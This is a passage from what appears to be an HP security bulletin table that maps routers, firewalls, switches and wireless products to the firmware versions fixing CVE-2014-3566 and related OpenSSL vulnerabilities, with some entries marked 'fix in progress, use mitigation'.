CVE-2014-3566 CVE-2014-3568
MSR30-16 R2513P33 JD659A HP MSR30-16 POE Multi-Service Router JD665A HP MSR30-16 Multi-Service Router JF233A HP MSR30-16 Router JF234A HP MSR30-16 PoE Router H3C RT-MSR3016-AC-OVS-H3 (0235A327) H3C RT-MSR3016-AC-POE-OVS-H3 (0235A321) H3C MSR 30-16 (0235A237) H3C MSR 30-16 POE (0235A238)
CVE-2014-3566 CVE-2014-3568
MSR30-1X R2513P33 JF800A HP MSR30-11 Router JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr JG182A HP MSR30-11E Router JG183A HP MSR30-11F Router JG184A HP MSR30-10 DC Router H3C MSR 30-10 Router Host(AC) 2FE 2SIC 1XMIM 256DDR (0235A39H) H3C RT-MSR3011-AC-OVS-H3 (0235A29L)
CVE-2014-3566 CVE-2014-3568
MSR50 R2513P33 JD433A HP MSR50-40 Router JD653A HP MSR50 Processor Module JD655A HP MSR50-40 Multi-Service Router JD656A HP MSR50-60 Multi-Service Router JF231A HP MSR50-60 Router JF285A HP MSR50-40 DC Router JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply H3C MSR 50-40 Router (0235A297) H3C MSR5040-DC-OVS-H3C (0235A20P) H3C RT-MSR5060-AC-OVS-H3 (0235A298) H3C MSR 50-40 Chassis (0235A20N) H3C MSR 50-60 Chassis (0235A20L)
CVE-2014-3566 CVE-2014-3568
MSR50-G2 R2513P33 JD429A HP MSR50 G2 Processor Module JD429B HP MSR50 G2 Processor Module H3C H3C MSR 50 Processor Module-G2 (0231A84Q) H3C MSR 50 High Performance Main Processing Unit 3GE (Combo) 256F/1GD(0231A0KL)
CVE-2014-3566 CVE-2014-3568
MSR20 Russian version MSR201X_5.20.R2513L40.RU JD663B HP MSR20-21 Router JF228A HP MSR20-40 Router JF283A HP MSR20-20 Router H3C RT-MSR2020-AC-OVS-H3C (0235A324) H3C RT-MSR2040-AC-OVS-H3 (0235A326)
CVE-2014-3566 CVE-2014-3568
MSR20-1X Russian version MSR201X_5.20.R2513L40.RU JD431A HP MSR20-10 Router JF236A HP MSR20-15-I Router JF237A HP MSR20-15-A Router JF238A HP MSR20-15-I-W Router JF239A HP MSR20-11 Router JF240A HP MSR20-13 Router JF241A HP MSR20-12 Router JF806A HP MSR20-12-T Router JF807A HP MSR20-12-W Router JF808A HP MSR20-13-W Router JF809A HP MSR20-15-A-W Router JF817A HP MSR20-15 Router H3C MSR 20-10 (0235A0A7) H3C RT-MSR2015-AC-OVS-I-H3 (0235A394) H3C RT-MSR2015-AC-OVS-A-H3 (0235A392) H3C RT-MSR2015-AC-OVS-AW-H3 (0235A393) H3C RT-MSR2011-AC-OVS-H3 (0235A395) H3C RT-MSR2013-AC-OVS-H3 (0235A390) H3C RT-MSR2012-AC-OVS-H3 (0235A396) H3C RT-MSR2012-T-AC-OVS-H3 (0235A398) H3C RT-MSR2012-AC-OVS-W-H3 (0235A397) H3C RT-MSR2013-AC-OVS-W-H3 (0235A391) H3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V) H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1 ADSLoPOTS 1 DSIC (0235A0A8)
CVE-2014-3566 CVE-2014-3568
MSR30 Russian version MSR201X_5.20.R2513L40.RU JF229A HP MSR30-40 Router JF230A HP MSR30-60 Router JF235A HP MSR30-20 DC Router JF284A HP MSR30-20 Router JF287A HP MSR30-40 DC Router JF801A HP MSR30-60 DC Router JF802A HP MSR30-20 PoE Router JF803A HP MSR30-40 PoE Router JF804A HP MSR30-60 PoE Router H3C RT-MSR3040-AC-OVS-H (0235A299) H3C RT-MSR3060-AC-OVS-H3 (0235A320) H3C RT-MSR3020-DC-OVS-H3 (0235A267) H3C MSR 30-20 Router (0235A328) H3C MSR 30-40 Router Host(DC) (0235A268) H3C RT-MSR3060-DC-OVS-H3 (0235A269) H3C RT-MSR3020-AC-POE-OVS-H3 (0235A322) H3C RT-MSR3040-AC-POE-OVS-H3 (0235A323) H3C RT-MSR3060-AC-POE-OVS-H3 (0235A296)
CVE-2014-3566 CVE-2014-3568
MSR30-16 Russian version MSR201X_5.20.R2513L40.RU JF233A HP MSR30-16 Router JF234A HP MSR30-16 PoE Router H3C RT-MSR3016-AC-OVS-H3 (0235A327) H3C RT-MSR3016-AC-POE-OVS-H3 (0235A321)
CVE-2014-3566 CVE-2014-3568
MSR30-1X Russian version MSR201X_5.20.R2513L40.RU JF800A HP MSR30-11 Router JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr JG182A HP MSR30-11E Router JG183A HP MSR30-11F Router JG184A HP MSR30-10 DC Router H3C RT-MSR3011-AC-OVS-H3 (0235A29L) H3C MSR 30-10 Router Host(AC) 2FE 2SIC 1XMIM 256DDR (0235A39H)
CVE-2014-3566 CVE-2014-3568
MSR50 Russian version MSR201X_5.20.R2513L40.RU JD433A HP MSR50-40 Router JD653A HP MSR50 Processor Module JD655A HP MSR50-40 Multi-Service Router JD656A HP MSR50-60 Multi-Service Router JF231A HP MSR50-60 Router JF285A HP MSR50-40 DC Router JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply H3C MSR 50-40 Router (0235A297) H3C MSR 50 Processor Module (0231A791) H3C MSR 50-40 Chassis (0235A20N) H3C MSR 50-60 Chassis (0235A20L) H3C RT-MSR5060-AC-OVS-H3 (0235A298) H3C MSR5040-DC-OVS-H3C (0235A20P)
CVE-2014-3566 CVE-2014-3568
MSR50 G2 Russian version MSR201X_5.20.R2513L40.RU JD429B HP MSR50 G2 Processor Module H3C MSR 50 High Performance Main Processing Unit 3GE (Combo) 256F/1GD (0231A0KL)
CVE-2014-3566 CVE-2014-3568
MSR9XX R2513P33 JF812A HP MSR900 Router JF813A HP MSR920 Router JF814A HP MSR900-W Router JF815A HP MSR920 2FEWAN/8FELAN/.11b/g Rtr JG207A HP MSR900-W Router (NA) JG208A HP MSR920-W Router (NA) H3C MSR 900 Router with 802.11b/g 2 FE WAN 4 FE LAN 256DDR 802.11b (0235A0C2) H3C MSR 900 Router 2 FE WAN 4 FE LAN 256DDR (0235A0BX) H3C MSR 920 Router with 802.11b/g 2 FE WAN 8 FE LAN 256DDR (0235A0C4) H3C MSR 920 Router 2 FE WAN 8 FE LAN 256DDR (0235A0C0)
CVE-2014-3566 CVE-2014-3568
MSR93X R2513P33 JG512A HP MSR930 Wireless Router JG513A HP MSR930 3G Router JG514A HP MSR931 Router JG515A HP MSR931 3G Router JG516A HP MSR933 Router JG517A HP MSR933 3G Router JG518A HP MSR935 Router JG519A HP MSR935 Wireless Router JG520A HP MSR935 3G Router JG531A HP MSR931 Dual 3G Router JG596A HP MSR930 4G LTE/3G CDMA Router JG597A HP MSR936 Wireless Router JG665A HP MSR930 4G LTE/3G WCDMA Global Router JG704A HP MSR930 4G LTE/3G WCDMA ATT Router
CVE-2014-3566 CVE-2014-3568
MSR1000 R2513P33 JG732A HP MSR1003-8 AC Router
CVE-2014-3566 CVE-2014-3568
MSR1000 Russian version R2513L40.RU JG732A HP MSR1003-8 AC Router
CVE-2014-3566 CVE-2014-3568
MSR2000 R0106P18 JG411A HP MSR2003 AC Router
CVE-2014-3566 CVE-2014-3567 CVE-2014-3568
MSR3000 R0106P18 JG404A HP MSR3064 Router JG405A HP MSR3044 Router JG406A HP MSR3024 AC Router JG409A HP MSR3012 AC Router JG861A HP MSR3024 TAA-compliant AC Router
CVE-2014-3566 CVE-2014-3567 CVE-2014-3568
MSR4000 R0106P18 JG402A HP MSR4080 Router Chassis JG403A HP MSR4060 Router Chassis JG412A HP MSR4000 MPU-100 Main Processing Unit
CVE-2014-3566 CVE-2014-3567 CVE-2014-3568
F5000 F3210P22 JG216A HP F5000 Firewall Standalone Chassis JD259A HP A5000-A5 VPN Firewall Chassis H3C SecPath F5000-A5 Host System (0150A0AG)
CVE-2014-3566 CVE-2014-3568
F5000-C R3811P03 JG650A HP F5000-C VPN Firewall Appliance
CVE-2014-3566 CVE-2014-3568
F5000-S R3811P03 JG370A HP F5000-S VPN Firewall Appliance
CVE-2014-3566 CVE-2014-3568
U200S and CS F5123P30 JD268A HP 200-CS UTM Appliance JD273A HP U200-S UTM Appliance H3C SecPath U200-S (0235A36N)
CVE-2014-3566 CVE-2014-3568
U200A and M F5123P30 JD274A HP 200-M UTM Appliance JD275A HP U200-A UTM Appliance H3C SecPath U200-A (0235A36Q)
CVE-2014-3566 CVE-2014-3568
SecBlade III R3820P03 JG371A HP 12500 20Gbps VPN Firewall Module JG372A HP 10500/11900/7500 20Gbps VPN FW Mod
CVE-2014-3566 CVE-2014-3568
SecBlade FW R3181P05 JC635A HP 12500 VPN Firewall Module JD245A HP 9500 VPN Firewall Module JD249A HP 10500/7500 Advanced VPN Firewall Mod JD250A HP 6600 Firewall Processing Rtr Module JD251A HP 8800 Firewall Processing Module JD255A HP 5820 VPN Firewall Module H3C S9500E SecBlade VPN Firewall Module (0231A0AV) H3C S7500E SecBlade VPN Firewall Module (0231A832) H3C SR66 Gigabit Firewall Module (0231A88A) H3C SR88 Firewall Processing Module (0231A88L) H3C S5820 SecBlade VPN Firewall Module (0231A94J)
CVE-2014-3566 CVE-2014-3568
F1000-E R3181P05 JD272A HP F1000-E VPN Firewall Appliance
CVE-2014-3566 CVE-2014-3568
F1000-A R3734P06 JG214A HP F1000-A-EI VPN Firewall Appliance
CVE-2014-3566 CVE-2014-3568
F1000-S R3734P06 JG213A HP F1000-S-EI VPN Firewall Appliance
CVE-2014-3566 CVE-2014-3568
SecBlade SSL VPN Fix in Progress Use Mitigation JD253A HP 10500/7500 SSL VPN Mod w 500-user Lic
CVE-2014-3566 CVE-2014-3568
VSR1000 R0204P01 JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software JG811AAE HP VSR1001 Comware 7 Virtual Services Router JG812AAE HP VSR1004 Comware 7 Virtual Services Router JG813AAE HP VSR1008 Comware 7 Virtual Services Router
CVE-2014-3566 CVE-2014-3567 CVE-2014-3568
WX5002/5004 R2507P34 JD441A HP 5800 ACM for 64-256 APs JD447B HP WX5002 Access Controller JD448A HP A-WX5004 Access Controller JD448B HP WX5004 Access Controller JD469A HP A-WX5004 (3Com) Access Controller JG261A HP 5800 Access Controller OAA TAA Mod
CVE-2014-3566 CVE-2014-3568
HP 850/870 R2607P34 JG723A HP 870 Unified Wired-WLAN Appliance JG725A HP 870 Unifd Wrd-WLAN TAA Applnc JG722A HP 850 Unified Wired-WLAN Appliance JG724A HP 850 Unifd Wrd-WLAN TAA Applnc
CVE-2014-3566 CVE-2014-3568
HP 830 R3507P34 JG640A HP 830 24P PoE+ Unifd Wired-WLAN Swch JG641A HP 830 8P PoE+ Unifd Wired-WLAN Swch JG646A HP 830 24-Port PoE+ Wrd-WLAN TAA Switch JG647A HP 830 8-Port PoE+ Wrd-WLAN TAA Switch
CVE-2014-3566 CVE-2014-3568
HP 6000 R2507P34 JG639A HP 10500/7500 20G Unified Wired-WLAN Mod JG645A HP 10500/7500 20G Unifd Wrd-WLAN TAA Mod
CVE-2014-3566 CVE-2014-3568
VCX Fix in Progress Use Mitigation J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr JC517A HP VCX V7205 Platform w/DL 360 G6 Server JE355A HP VCX V6000 Branch Platform 9.0 JC516A HP VCX V7005 Platform w/DL 120 G6 Server JC518A HP VCX Connect 200 Primry 120 G6 Server J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr JE341A HP VCX Connect 100 Secondary JE252A HP VCX Connect Primary MIM Module JE253A HP VCX Connect Secondary MIM Module JE254A HP VCX Branch MIM Module JE355A HP VCX V6000 Branch Platform 9.0 JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod JD023A HP MSR30-40 Router with VCX MIM Module JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS JE340A HP VCX Connect 100 Pri Server 9.0 JE342A HP VCX Connect 100 Sec Server 9.0
CVE-2014-3566 CVE-2014-3568
iMC PLAT iMC PLAT v7.1 E0303P06 JD125A HP IMC Std S/W Platform w/100-node JD126A HP IMC Ent S/W Platform w/100-node JD808A HP IMC Ent Platform w/100-node License JD815A HP IMC Std Platform w/100-node License JF377A HP IMC Std S/W Platform w/100-node Lic JF377AAE HP IMC Std S/W Pltfrm w/100-node E-LTU JF378A HP IMC Ent S/W Platform w/200-node Lic JF378AAE HP IMC Ent S/W Pltfrm w/200-node E-LTU JG546AAE HP IMC Basic SW Platform w/50-node E-LTU JG548AAE HP PCM+ to IMC Bsc Upgr w/50-node E-LTU JG549AAE HP PCM+ to IMC Std Upgr w/200-node E-LTU JG550AAE HP PMM to IMC Bsc WLM Upgr w/150AP E-LTU JG590AAE HP IMC Bsc WLAN Mgr SW Pltfm 50 AP E-LTU JG659AAE HP IMC Smart Connect VAE E-LTU JG660AAE HP IMC Smart Connect w/WLM VAE E-LTU JG747AAE HP IMC Std SW Plat w/ 50 Nodes E-LTU JG748AAE HP IMC Ent SW Plat w/ 50 Nodes E-LTU JG766AAE HP IMC SmCnct Vrtl Applnc SW E-LTU JG767AAE HP IMC SmCnct WSM Vrtl Applnc SW E-LTU JG768AAE HP PCM+ to IMC Std Upg w/ 200-node E-LTU
CVE-2014-3566
iMC UAM iMC UAM v7.1 E0302P07 JD144A HP IMC UAM S/W Module w/200-User License JF388A HP IMC UAM S/W Module w/200-user License JF388AAE HP IMC UAM S/W Module w/200-user E-LTU JG752AAE HP IMC UAM SW Mod w/ 50-user E-LTU
CVE-2014-3513 CVE-2014-3566 CVE-2014-3567
iMC WSM Fix in Progress Use Mitigation JD456A HP WSM Plug-in for IMC Includes 50 Aps JF414A HP IMC WSM S/W Module with 50-AP License JF414AAE HP IMC WSM S/W Module with 50-AP E-LTU JG551AAE HP PMM to IMC WSM Upgr w/250 AP E-LTU JG769AAE HP PMM to IMC WSM Upg w/ 250-node E-LTU
CVE-2014-3513 CVE-2014-3566 CVE-2014-3567
A Fixes in progress use mitigations J9565A HP 2615-8-PoE Switch J9562A HP 2915-8G-PoE Switch
E Fixes in progress use mitigations J4850A HP ProCurve Switch 5304xl J8166A HP ProCurve Switch 5304xl-32G J4819A HP ProCurve Switch 5308xl J8167A HP ProCurve Switch 5308xl-48G J4849A HP ProCurve Switch 5348xl J4849B HP ProCurve Switch 5348xl J4848A HP ProCurve Switch 5372xl J4848B HP ProCurve Switch 5372xl
F Fixes in progress use mitigations J4812A HP ProCurve 2512 Switch J4813A HP ProCurve 2524 Switch J4817A HP ProCurve 2312 Switch J4818A HP ProCurve 2324 Switch
H.07 Fixes in progress use mitigations J4902A HP ProCurve 6108 Switch
H.10 Fixes in progress use mitigations J8762A HP E2600-8-PoE Switch J4900A HP PROCURVE SWITCH 2626 J4900B HP ProCurve Switch 2626 J4900C ProCurve Switch 2626 J4899A HP ProCurve Switch 2650 J4899B HP ProCurve Switch 2650 J4899C ProCurve Switch 2650 J8164A ProCurve Switch 2626-PWR J8165A HP ProCurve Switch 2650-PWR
i.10 Fixes in progress use mitigations J4903A ProCurve Switch 2824 J4904A HP ProCurve Switch 2848
J Fixes in progress use mitigations J9299A HP 2520-24G-PoE Switch J9298A HP 2520-8G-PoE Switch
K Fixes in progress use mitigations J8692A HP 3500-24G-PoE yl Switch J8693A HP 3500-48G-PoE yl Switch J9310A HP 3500-24G-PoE+ yl Switch J9311A HP 3500-48G-PoE+ yl Switch J9470A HP 3500-24 Switch J9471A HP 3500-24-PoE Switch J9472A HP 3500-48 Switch J9473A HP 3500-48-PoE Switch J8697A HP E5406 zl Switch Chassis J8699A HP 5406-48G zl Switch J9447A HP 5406-44G-PoE+-4SFP zl Switch J9533A HP 5406-44G-PoE+-2XG v2 zl Swch w Pm SW J9539A HP 5406-44G-PoE+-4G v2 zl Swch w Prm SW J9642A HP 5406 zl Switch with Premium Software J9866A HP 5406 8p10GT 8p10GE Swch and Psw J8698A HP E5412 zl Switch Chassis J8700A HP 5412-96G zl Switch J9448A HP 5412-92G-PoE+-4SFP zl Switch J9532A HP 5412-92G-PoE+-2XG v2 zl Swch w Pm SW J9540A HP 5412-92G-PoE+-4G v2 zl Swch w Prm SW J9643A HP 5412 zl Switch with Premium Software J8992A HP 6200-24G-mGBIC yl Switch J9263A HP E6600-24G Switch J9264A HP 6600-24G-4XG Switch J9265A HP 6600-24XG Switch J9451A HP E6600-48G Switch J9452A HP 6600-48G-4XG Switch J9475A HP E8206 zl Switch Base System J9638A HP 8206-44G-PoE+-2XG v2 zl Swch w Pm SW J9640A HP 8206 zl Switch w/Premium Software J8715A ProCurve Switch 8212zl Base System J8715B HP E8212 zl Switch Base System J9091A ProCurve Switch 8212zl Chassis&Fan Tray J9639A HP 8212-92G-PoE+-2XG v2 zl Swch w Pm SW J9641A HP 8212 zl Switch with Premium SW
KA Fixes in progress use mitigations J9573A HP 3800-24G-PoE+-2SFP+ Switch J9574A HP 3800-48G-PoE+-4SFP+ Switch J9575A HP 3800-24G-2SFP+ Switch J9576A HP 3800-48G-4SFP+ Switch J9584A HP 3800-24SFP-2SFP+ Switch J9585A HP 3800-24G-2XG Switch J9586A HP 3800-48G-4XG Switch J9587A HP 3800-24G-PoE+-2XG Switch J9588A HP 3800-48G-PoE+-4XG Switch
KB Fixes in progress use mitigations J9821A HP 5406R zl2 Switch J9822A HP 5412R zl2 Switch J9823A HP 5406R-Gig-T-PoE+/SFP+ v2 zl2 Swch J9824A HP 5406R-Gig-T-PoE+/SFP v2 zl2 Swch J9825A HP 5412R-Gig-T-PoE+/SFP+ v2 zl2 Swch J9826A HP 5412R-Gig-T-PoE+/SFP v2 zl2 Swch J9850A HP 5406R zl2 Switch J9851A HP 5412R zl2 Switch J9868A HP 5406R-8XGT/8SFP+ v2 zl2 Swch
L Fixes in progress use mitigations J8772B HP 4202-72 Vl Switch J8770A HP 4204 Vl Switch Chassis J9064A HP 4204-44G-4SFP Vl Switch J8773A HP 4208 Vl Switch Chassis J9030A HP 4208-68G-4SFP Vl Switch J8775B HP 4208-96 Vl Switch J8771A ProCurve Switch 4202VL-48G J8772A ProCurve Switch 4202VL-72 J8774A ProCurve Switch 4208VL-64G J8775A ProCurve Switch 4208VL-96
M.08 Fixes in progress use mitigations J8433A HP 6400-6XG cl Switch J8474A HP 6410-6XG cl Switch
M.10 Fixes in progress use mitigations J4906A HP E3400-48G cl Switch J4905A HP ProCurve Switch 3400cl-24G
N Fixes in progress use mitigations J9021A HP 2810-24G Switch J9022A HP 2810-48G Switch
PA Fixes in progress use mitigations J9029A ProCurve Switch 1800-8G
PB Fixes in progress use mitigations J9028A ProCurve Switch 1800-24G J9028B ProCurve Switch 1800-24G
Q Fixes in progress use mitigations J9019B HP 2510-24 Switch J9019A ProCurve Switch 2510-24
R Fixes in progress use mitigations J9085A HP 2610-24 Switch J9087A HP 2610-24-PoE Switch J9086A HP 2610-24-PPoE Switch J9088A HP 2610-48 Switch J9089A HP 2610-48-PoE Switch
RA Fixes in progress use mitigations J9623A HP 2620-24 Switch J9624A HP 2620-24-PPoE+ Switch J9625A HP 2620-24-PoE+ Switch J9626A HP 2620-48 Switch J9627A HP 2620-48-PoE+ Switch
S Fixes in progress use mitigations J9138A HP 2520-24-PoE Switch J9137A HP 2520-8-PoE Switch
T Fixes in progress use mitigations J9049A ProCurve Switch 2900- 24G J9050A ProCurve Switch 2900 48G
U Fixes in progress use mitigations J9020A HP 2510-48 Switch
VA Fixes in progress use mitigations J9079A HP 1700-8 Switch
VB Fixes in progress use mitigations J9080A HP 1700-24 Switch
W Fixes in progress use mitigations J9145A HP 2910-24G al Switch J9146A HP 2910-24G-PoE+ al Switch J9147A HP 2910-48G al Switch J9148A HP 2910-48G-PoE+ al Switch
WB Fixes in progress use mitigations J9726A HP 2920-24G Switch J9727A HP 2920-24G-POE+ Switch J9728A HP 2920-48G Switch J9729A HP 2920-48G-POE+ Switch J9836A HP 2920-48G-POE+ 740W Switch
Y Fixes in progress use mitigations J9279A HP 2510-24G Switch J9280A HP 2510-48G Switch
YA Fixes in progress use mitigations J9772A HP 2530-48G-PoE+ Switch J9773A HP 2530-24G-PoE+ Switch J9774A HP 2530-8G-PoE+ Switch J9775A HP 2530-48G Switch J9776A HP 2530-24G Switch J9777A HP 2530-8G Switch J9778A HP 2530-48-PoE+ Switch J9781A HP 2530-48 Switch J9853A HP 2530-48G-PoE+-2SFP+ Switch J9854A HP 2530-24G-PoE+-2SFP+ Switch J9855A HP 2530-48G-2SFP+ Switch J9856A HP 2530-24G-2SFP+ Switch
YB Fixes in progress use mitigations J9779A HP 2530-24-PoE+ Switch J9780A HP 2530-8-PoE+ Switch J9782A HP 2530-24 Switch J9783A HP 2530-8 Switch
MSM 6.5 6.5.1.0 J9420A HP MSM760 Premium Mobility Controller J9421A HP MSM760 Access Controller J9370A HP MSM765 Zl Premium Mobility Controller J9693A HP MSM720 Access Controller (WW) J9694A HP MSM720 Premium Mobility Cntlr (WW) J9695A HP MSM720 TAA Access Controller J9696A HP MSM720 TAA Premium Mobility Cntlr J9840A HP MSM775 zl Premium Controller Module J9845A HP 560 Wireless 802.11ac (AM) AP J9846A HP 560 Wireless 802.11ac (WW) AP J9847A HP 560 Wireless 802.11ac (JP) AP J9848A HP 560 Wireless 802.11ac (IL) AP J9358A HP E-MSM422 Access Point (US) J9358B HP MSM422 Access Point (US) J9359A HP E-MSM422 Access Point (WW) J9359B HP MSM422 Access Point (WW) J9530A HP E-MSM422 Access Point (JP) J9530B HP MSM422 Access Point (JP) J9617A HP MSM422 Dual Radio 802.11n AP (IL) J9426A HP E-MSM410 Access Point (US) J9426B HP MSM410 Access Point (US) J9427A HP E-MSM410 Access Point (WW) J9427B HP MSM410 Access Point (WW) J9427C HP MSM410 Access Point (WW) J9529A HP E-MSM410 Access Point (JP) J9529B HP MSM410 Access Point (JP) J9589A HP MSM460 Dual Radio 802.11n AP (JP) J9590A HP MSM460 Dual Radio 802.11n AP (AM) J9591A HP MSM460 Dual Radio 802.11n AP (WW) J9616A HP MSM410 Single Radio 802.11n AP (IL) J9618A HP MSM460 Dual Radio 802.11n AP (IL) J9619A HP MSM466 Dual Radio 802.11n AP (IL) J9620A HP MSM466 Dual Radio 802.11n AP (JP) J9621A HP MSM466 Dual Radio 802.11n AP (AM) J9622A HP MSM466 Dual Radio 802.11n AP (WW) J9650A HP MSM430 Dual Radio 802.11n AP (AM) J9651A HP MSM430 Dual Radio 802.11n AP (WW) J9652A HP MSM430 Dual Radio 802.11n AP (JP) J9653A HP MSM430 Dual Radio 802.11n AP (IL) J9654A HP MSM430 Dual Radio 802.11n TAA AP J9655A HP MSM460 Dual Radio 802.11n TAA AP J9656A HP MSM466 Dual Radio 802.11n TAA AP J9715A HP E-MSM466-R Dual Radio 802.11n AP (AM) J9716A HP E-MSM466-R Dual Radio 802.11n AP (WW) J9717A HP E-MSM466-R Dual Radio 802.11n AP (JP) J9718A HP E-MSM466-R Dual Radio 802.11n AP (IL)
MSM 6.4 6.4.2.1 J9840A HP MSM775 zl Premium Controller Module J9370A HP MSM765 Zl Premium Mobility Controller J9420A HP MSM760 Premium Mobility Controller J9421A HP MSM760 Access Controller J9693A HP MSM720 Access Controller (WW) J9694A HP MSM720 Premium Mobility Cntlr (WW) J9695A HP MSM720 TAA Access Controller J9696A HP MSM720 TAA Premium Mobility Cntlr J9426A HP E-MSM410 Access Point (US) J9426B HP MSM410 Access Point (US) J9427A HP E-MSM410 Access Point (WW) J9427B HP MSM410 Access Point (WW) J9427C HP MSM410 Access Point (WW) J9529A HP E-MSM410 Access Point (JP) J9529B HP MSM410 Access Point (JP) J9589A HP MSM460 Dual Radio 802.11n AP (JP) J9590A HP MSM460 Dual Radio 802.11n AP (AM) J9591A HP MSM460 Dual Radio 802.11n AP (WW) J9616A HP MSM410 Single Radio 802.11n AP (IL) J9618A HP MSM460 Dual Radio 802.11n AP (IL) J9619A HP MSM466 Dual Radio 802.11n AP (IL) J9620A HP MSM466 Dual Radio 802.11n AP (JP) J9621A HP MSM466 Dual Radio 802.11n AP (AM) J9622A HP MSM466 Dual Radio 802.11n AP (WW) J9650A HP MSM430 Dual Radio 802.11n AP (AM) J9651A HP MSM430 Dual Radio 802.11n AP (WW) J9652A HP MSM430 Dual Radio 802.11n AP (JP) J9653A HP MSM430 Dual Radio 802.11n AP (IL) J9654A HP MSM430 Dual Radio 802.11n TAA AP J9655A HP MSM460 Dual Radio 802.11n TAA AP J9656A HP MSM466 Dual Radio 802.11n TAA AP J9715A HP E-MSM466-R Dual Radio 802.11n AP (AM) J9716A HP E-MSM466-R Dual Radio 802.11n AP (WW) J9717A HP E-MSM466-R Dual Radio 802.11n AP (JP) J9718A HP E-MSM466-R Dual Radio 802.11n AP (IL) J9358A HP E-MSM422 Access Point (US) J9358B HP MSM422 Access Point (US) J9359A HP E-MSM422 Access Point (WW) J9359B HP MSM422 Access Point (WW) J9530A HP E-MSM422 Access Point (JP) J9530B HP MSM422 Access Point (JP) J9617A HP MSM422 Dual Radio 802.11n AP (IL)
MSM 6.3 6.3.1.0 J9529B HP MSM410 Access Point (JP) J9589A HP MSM460 Dual Radio 802.11n AP (JP) J9590A HP MSM460 Dual Radio 802.11n AP (AM) J9591A HP MSM460 Dual Radio 802.11n AP (WW) J9616A HP MSM410 Single Radio 802.11n AP (IL) J9618A HP MSM460 Dual Radio 802.11n AP (IL) J9619A HP MSM466 Dual Radio 802.11n AP (IL) J9620A HP MSM466 Dual Radio 802.11n AP (JP) J9621A HP MSM466 Dual Radio 802.11n AP (AM) J9622A HP MSM466 Dual Radio 802.11n AP (WW) J9650A HP MSM430 Dual Radio 802.11n AP (AM) J9651A HP MSM430 Dual Radio 802.11n AP (WW) J9652A HP MSM430 Dual Radio 802.11n AP (JP) J9653A HP MSM430 Dual Radio 802.11n AP (IL) J9654A HP MSM430 Dual Radio 802.11n TAA AP J9655A HP MSM460 Dual Radio 802.11n TAA AP J9656A HP MSM466 Dual Radio 802.11n TAA AP J9715A HP E-MSM466-R Dual Radio 802.11n AP (AM) J9716A HP E-MSM466-R Dual Radio 802.11n AP (WW) J9717A HP E-MSM466-R Dual Radio 802.11n AP (JP) J9718A HP E-MSM466-R Dual Radio 802.11n AP (IL) J9356A HP E-MSM335 Access Point (US) J9356B HP MSM335 Access Point (US) J9357A HP E-MSM335 Access Point (WW) J9357B HP MSM335 Access Point (WW) J9358A HP E-MSM422 Access Point (US) J9358B HP MSM422 Access Point (US) J9359A HP E-MSM422 Access Point (WW) J9359B HP MSM422 Access Point (WW) J9530A HP E-MSM422 Access Point (JP) J9530B HP MSM422 Access Point (JP) J9617A HP MSM422 Dual Radio 802.11n AP (IL) J9360A HP E-MSM320 Access Point (US) J9360B HP MSM320 Access Point (US) J9364A HP E-MSM320 Access Point (WW) J9364B HP MSM320 Access Point (WW) J9365A HP MSM320-R Access Point (US) J9365B HP MSM320-R Access Point (US) J9368A HP E-MSM320-R Access Point (WW) J9368B HP MSM320-R Access Point (WW) J9373A HP E-MSM325 Access Point (WW) J9373B HP MSM325 Access Point (WW) J9374A HP E-MSM310 Access Point (US) J9374B HP MSM310 Access Point (US) J9379A HP MSM310 Access Point (WW) J9379B HP MSM310 Access Point (WW) J9380A HP E-MSM310-R Access Point (US) J9380B HP MSM310-R Access Point (US) J9383A HP E-MSM310-R Access Point (WW) J9383B HP MSM310-R Access Point (WW) J9524A HP E-MSM310 Access Point (JP) J9524B HP MSM310 Access Point (JP) J9527A HP E-MSM320 Access Point (JP) J9527B HP MSM320 Access Point (JP) J9528A HP E-MSM320-R Access Point (JP) J9528B HP MSM320-R Access Point (JP)
MSM 6.2 6.2.1.2 J9370A HP MSM765 Zl Premium Mobility Controller J9356A HP E-MSM335 Access Point (US) J9356B HP MSM335 Access Point (US) J9357A HP E-MSM335 Access Point (WW) J9357B HP MSM335 Access Point (WW) J9358A HP E-MSM422 Access Point (US) J9358B HP MSM422 Access Point (US) J9359A HP E-MSM422 Access Point (WW) J9359B HP MSM422 Access Point (WW) J9530A HP E-MSM422 Access Point (JP) J9530B HP MSM422 Access Point (JP) J9617A HP MSM422 Dual Radio 802.11n AP (IL) J9420A HP MSM760 Premium Mobility Controller J9421A HP MSM760 Access Controller J9840A HP MSM775 zl Premium Controller Module J9360A HP E-MSM320 Access Point (US) J9360B HP MSM320 Access Point (US) J9364A HP E-MSM320 Access Point (WW) J9364B HP MSM320 Access Point (WW) J9365A HP MSM320-R Access Point (US) J9365B HP MSM320-R Access Point (US) J9368A HP E-MSM320-R Access Point (WW) J9368B HP MSM320-R Access Point (WW) J9373A HP E-MSM325 Access Point (WW) J9373B HP MSM325 Access Point (WW) J9374A HP E-MSM310 Access Point (US) J9374B HP MSM310 Access Point (US) J9379A HP MSM310 Access Point (WW) J9379B HP MSM310 Access Point (WW) J9380A HP E-MSM310-R Access Point (US) J9380B HP MSM310-R Access Point (US) J9383A HP E-MSM310-R Access Point (WW) J9383B HP MSM310-R Access Point (WW) J9524A HP E-MSM310 Access Point (JP) J9524B HP MSM310 Access Point (JP) J9527A HP E-MSM320 Access Point (JP) J9527B HP MSM320 Access Point (JP) J9528A HP E-MSM320-R Access Point (JP) J9528B HP MSM320-R Access Point (JP) J9426A HP E-MSM410 Access Point (US) J9426B HP MSM410 Access Point (US) J9427A HP E-MSM410 Access Point (WW) J9427B HP MSM410 Access Point (WW) J9427C HP MSM410 Access Point (WW) J9529A HP E-MSM410 